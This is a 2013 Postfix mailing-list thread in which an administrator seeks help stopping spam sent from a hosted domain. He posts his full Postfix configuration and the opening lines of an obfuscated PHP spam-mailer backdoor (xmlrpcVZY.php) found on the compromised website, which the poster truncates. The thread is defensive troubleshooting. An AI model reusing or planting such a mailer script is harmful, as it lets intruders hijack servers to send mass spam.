On 10/7/2013 9:10 PM, li...@sbt.net.au wrote:
> On Tue, October 8, 2013 11:31 am, Simon B wrote:
>> On 8 Oct 2013 01:54, "Voytek" <li...@sbt.net.au> wrote:
>
>> spam from many.na...@adomain.tld, how best to prevent any outbound mails
>> from adomain.tld till I can look at this?
>
>> Postfix stop
>>
>>
>> Then post your postconf -n and a log snippet of an outgoing span press.
>
> Simon, thanks
Without the log entries Simon asked for we can't do anything more to
help you, as we don't know how the spam is being injected. Please
provide logging that demonstrates the problem.
> --------------------
> # postconf -n
> address_verify_sender = $double_bounce_sender
> alias_database = hash:/etc/aliases
> alias_maps = hash:/etc/aliases
> anvil_rate_time_unit = 1800s
> body_checks = pcre:/etc/postfix/body_checks
> body_checks_size_limit = 150000
> broken_sasl_auth_clients = yes
> command_directory = /usr/sbin
> config_directory = /etc/postfix
> content_filter = smtp-amavis:[127.0.0.1]:10024
> daemon_directory = /usr/libexec/postfix
> debug_peer_level = 2
> disable_vrfy_command = yes
> header_checks = pcre:/etc/postfix/header_checks
> home_mailbox = Maildir/
> html_directory = /usr/share/doc/postfix-2.4.5-documentation/html
> local_recipient_maps = unix:passwd.byname $alias_maps
> local_transport = local
> mail_owner = postfix
> mailq_path = /usr/bin/mailq.postfix
> manpage_directory = /usr/share/man
> message_size_limit = 15360000
> mime_header_checks = pcre:$config_directory/mime_headers.pcre
> mydestination = $myhostname, localhost.$mydomain
> myhostname = server.tld
> mynetworks = 111.222.333.444 222.333.444.555 127.0.0.1
> myorigin = $mydomain
> newaliases_path = /usr/bin/newaliases.postfix
> queue_directory = /var/spool/postfix
> readme_directory = /usr/share/doc/postfix-2.4.5-documentation/readme
> recipient_bcc_maps = hash:/etc/postfix/bcc_r_maps
> recipient_delimiter = +
> sample_directory = /etc/postfix/samples
> sender_bcc_maps = hash:/etc/postfix/bcc_s_maps
> sendmail_path = /usr/sbin/sendmail.postfix
> setgid_group = postdrop
> smtp_tls_cert_file = $smtpd_tls_cert_file
> smtp_tls_key_file = $smtpd_tls_key_file
> smtp_tls_loglevel = 1
> smtp_tls_note_starttls_offer = yes
> smtp_tls_security_level = may
> smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
> smtp_tls_session_cache_timeout = 3600s
> smtpd_client_connection_rate_limit = 50
> smtpd_data_restrictions = reject_unauth_pipelining, permit
> smtpd_helo_required = yes
> smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated,
> check_helo_access ${RE}helo.re
> smtpd_recipient_restrictions = permit_sasl_authenticated,
> permit_mynetworks, reject_unauth_destination, check_recipient_access
> hash:/etc/postfix/recipient_no_checks, reject_non_fqdn_sender,
> reject_non_fqdn_recipient, reject_invalid_helo_hostname,
> reject_non_fqdn_helo_hostname, reject_unknown_sender_domain,
> reject_unknown_reverse_client_hostname, reject_unlisted_recipient,
> check_sender_access hash:/etc/postfix/freemail_access,
> check_recipient_access pcre:/etc/postfix/recipient_checks.pcre,
> check_helo_access hash:/etc/postfix/helo_checks, check_sender_access
> hash:/etc/postfix/sender_checks, check_client_access
> hash:/etc/postfix/client_checks, check_client_access
> pcre:/etc/postfix/client_checks.pcre, reject_rbl_client zen.spamhaus.org,
> reject_rhsbl_client dbl.spamhaus.org, reject_rhsbl_sender
> dbl.spamhaus.org, reject_rbl_client psbl.surriel.com, reject_rbl_client
> bl.spamcop.net, reject_rhsbl_sender dsn.rfc-ignorant.org,
> check_policy_service inet:127.0.0.1:10031, permit
> smtpd_restriction_classes = from_freemail_host
> smtpd_sasl_auth_enable = yes
> smtpd_sasl_authenticated_header = yes
> smtpd_sasl_local_domain =
> smtpd_sasl_path = private/auth
> smtpd_sasl_security_options = noanonymous
> smtpd_sasl_type = dovecot
> smtpd_tls_auth_only = yes
> smtpd_tls_cert_file = /etc/pki/tls/certs/server.crt
> smtpd_tls_key_file = /etc/pki/tls/certs/server.key
> smtpd_tls_loglevel = 1
> smtpd_tls_received_header = yes
> smtpd_tls_security_level = may
> smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
> smtpd_tls_session_cache_timeout = 36000s
> strict_rfc821_envelopes = yes
> tls_random_source = dev:/dev/urandom
> transport_maps = hash:/etc/postfix/transport
> unknown_local_recipient_reject_code = 550
> virtual_alias_maps = proxy:mysql:/etc/postfix/mysql_virtual_alias_maps.cf
> virtual_gid_maps = static:5000
> virtual_mailbox_base = /var/mail/vhosts
> virtual_mailbox_domains =
> proxy:mysql:/etc/postfix/mysql_virtual_domains_maps.cf
> virtual_mailbox_limit = $message_size_limit
> virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf
> virtual_minimum_uid = 5000
> virtual_transport = lmtp:unix:private/dovecot-lmtp
> virtual_uid_maps = static:5000
>
> --------------------
>
> there is a php script on their web as so, I'm trying to see how it was
> uploaded at this point:
>
> ---------------------
> head xmlrpcVZY.php
> <?php
> @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL);
> @ini_set('log_errors',0); if (count($_POST) < 2) {
> die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false;
> foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case
> chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 =
> $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case
> chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' ||
> $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
> $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
> $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38];
> $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 =
> n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 =
> n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203));
> $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 =
> urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) !=
> false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 =
> count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; }
> for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 =
> $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1))
> continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b,
> $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203));
> $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc);
> $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' ||
> $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c;
> } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else {
> $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203);
> $v3a5939e4 = next(explode('@', $v01b6e203)); }
> preg_match('|<USER>(.*)</USER>|
> snip
> ---------------------
>
> (i wasn't able to include above as I was on 4" mobile screen, sorry)
>
>
>
